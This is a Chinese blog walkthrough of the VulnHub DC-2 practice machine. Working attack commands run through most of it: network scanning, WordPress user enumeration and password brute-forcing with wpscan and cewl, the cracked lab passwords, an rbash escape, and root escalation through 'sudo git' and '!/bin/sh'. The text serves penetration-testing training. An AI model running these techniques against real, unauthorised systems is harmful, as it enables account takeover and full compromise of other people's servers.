DC-2通关详解

已于 2024-09-27 10:15:14 修改
阅读量829 收藏 23
点赞数 20
文章标签: 网络安全
于 2024-09-27 00:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84741371/article/details/142562899
版权

步骤一:环境搭建

1、与DC-1很相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。

2、下载靶场环境

靶场下载地址:https://www.vulnhub.com/entry/dc-2,311/

步骤二:渗透靶场

1、目标:就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2、信息收集:寻找靶机真实IP

nmap - sP 192.168.174.0/24

3、信息收集:探端口及服务

nmap -A -p- -v 192.168.174.130

发现了80端口,存在web服务,Apache/2.4.10

发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1

4、访问web站点

http:// 192.168.174.130

发现访问不了,输入的IP地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。

修改hosts文件,添加靶机IP到域名dc-2地指向

vim /etc/hosts

添加完成之后,再次去访问,访问成功

可以明显发现这是一个wordpress的站点

5、发现flag1   在网页下面的flag

点进入发现是flag1,大致意思就是暴力破解账号和密码

6、做一个目录扫描

dirb http://dc-2/

发现疑似后台地址

打开上面第一个链接,打开之后进入到登录页面

发现多个遍历,但好像没有什么有用的东西

7、用户名枚举

前面提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描

Wpscan一些常用的语句:wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

 扫描wordpress版本

wpscan --url http://dc-2

发现wordpress的版本4.7.10

登录页面尝试登录

随即输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举

首先来个用户枚举,在尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

枚举出三个用户名

admin jerry tom

8、暴力破解出账号密码

根据flag1可以用暴力破解,我们使用cewl生成字典,

cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dc2.txt

爆破出来两个账号

jerry/adipiscing

tom/parturient

jerry/adipiscing登录此站点

tom/parturient登陆此站点

9、发现flag2

   登录后台之后,我们看到flag2,我用的是jerry的账号

点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh

If you can't exploit WordPress and take a shortcut, there is another way.

如果你不能利用WordPress并采取一条捷径,还有另外一种方法。

Hope you found another entry point.

10、在tom的家目录发现flag3

jerry/adipiscing

tom/parturient

 登录ssh

ssh tom@192.168.66.141 -p 7744

在tom账号的家目录 发现flag3
cat用不了

我这里把查看命令都尝试了一遍 less和vi可以来查看,

提示内容如下

接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642

查看可以使用的命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

11、在jerry的家目录发现flag4

看到提示信息如下:

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git

我们可以通过git来提权

 使用tom用户无权限运行sudo 我们切换到jerry用户

我们可以看到无需root权限,jerry 可以使用 git

sudo -l  

12、提权

查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

jerry用户也不可以直接sudo su

使用git命令进行提取

sudo git help status

输入!/bin/sh,直接输入就行

​​​​​​​

提权成功

13.发现final-flag.txt

cd /root

cat final-flag.txt

根据以上步骤则实验完成!

syy12555555
关注
DC-2 通关详解
2401_83566240的博客
09-26 662
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2298
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1035
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
靶场DC-2通关详解
最新发布
2401_87609787的博客
09-27 697
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-05 1818
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 989
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1225
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1 通关详解
2401_83566240的博客
09-20 734
​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.​ SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。
DC-1通关详解
海里游的一条鱼
09-23 929
DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。
DC-DC变换电路详解
04-12
非常详细的介绍了升降压的过程,以及计算公式,常用的斩波电路等
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
电源设计细节:DC-DC转换器之接地环路详解
07-27
DC-DC转换器为整个系统中的各个电路供电。尽管每个电路在测试台上可能表现很好,但系统整体性能却往往达不到各个电路的性能效果。为什么?有许多潜在因素,而系统中各个电路的整体接地系统是首要原因。设计师需要...
DC-DC升压和降压电路电感参数选择详解.pdf
09-17
DC-DC升压和降压电路电感参数选择详解pdf,DC-DC电路电感的选择简介:在开关电源的设计中电感的设计为工程师带来的许多的挑战。工程师不仅要选择电感值,还要考虑电感可承受的电流,绕线电阻,机械尺寸等等。本文专注...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
python摄影交流平台代码
09-26
python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码python摄影交流平台代码
线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统
09-26
线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统-线上辅导班系统 1、资源说明:线上辅导班系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
Java-ssm-jsp基于微信小程序的校园二手物品交易系统实现源码(源代码+说明文档)
09-26
首页:首页可以看到所有类别的二手物品。 全部:可以看到不同类别,比如电子产品、服装等商品信息 发布:可以发布自己的二手物品 我的:个人中心中主要是针对自己的信息资料进行查询管理,主要内容那肯定就会有对于个人资料的修改操作还有我们管理人员经常把修改密码和我的收藏放在一起的功能操作了。 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jsp、spring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
基于 C++ 实现(控制台)图书馆管理系统
09-26
第 1.1 节 软件编写目的 目的:为实现图书管理的信息化、简单化,增加图书管理的功能,减轻图书管理员的劳动负担,及时、准确地反馈 图书信息。 此软件具备完整显示书籍清单、借还书操作简便、准确反馈书籍信息等功能,适用于闭环管理的图书馆,应用于学 生、教师等在闭环管理范围之内的人群。 第 1.2 节 项目背景 北京化工大学小学期 C 语言程序实训:图书馆管理系统 第 1.3 节 定义 项目符合标准C 语言的代码定义 第 1.4 节 参考资料 a.选题来源:北京化工大学小学期 C 语言程序设计实训:图书管理系统 b.项目遵循的许可 Apache License 2.0 第 1.5 节 软件功能说明 软件结构分为 sign(),menu(),ist0,borrow0),ret0),update0,menu ykO,lis yk0. 其功能分别为:sign0读取文件中的账号密码验证登录,识别用户权限登录,游客模式进入; menu0显示功能,输入之后进入对应菜单,异常处理, list0)把书的列表从文件中读出并 print 在屏幕上; borrow()查找图书,全局模糊查询(书名,作者,出版社
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值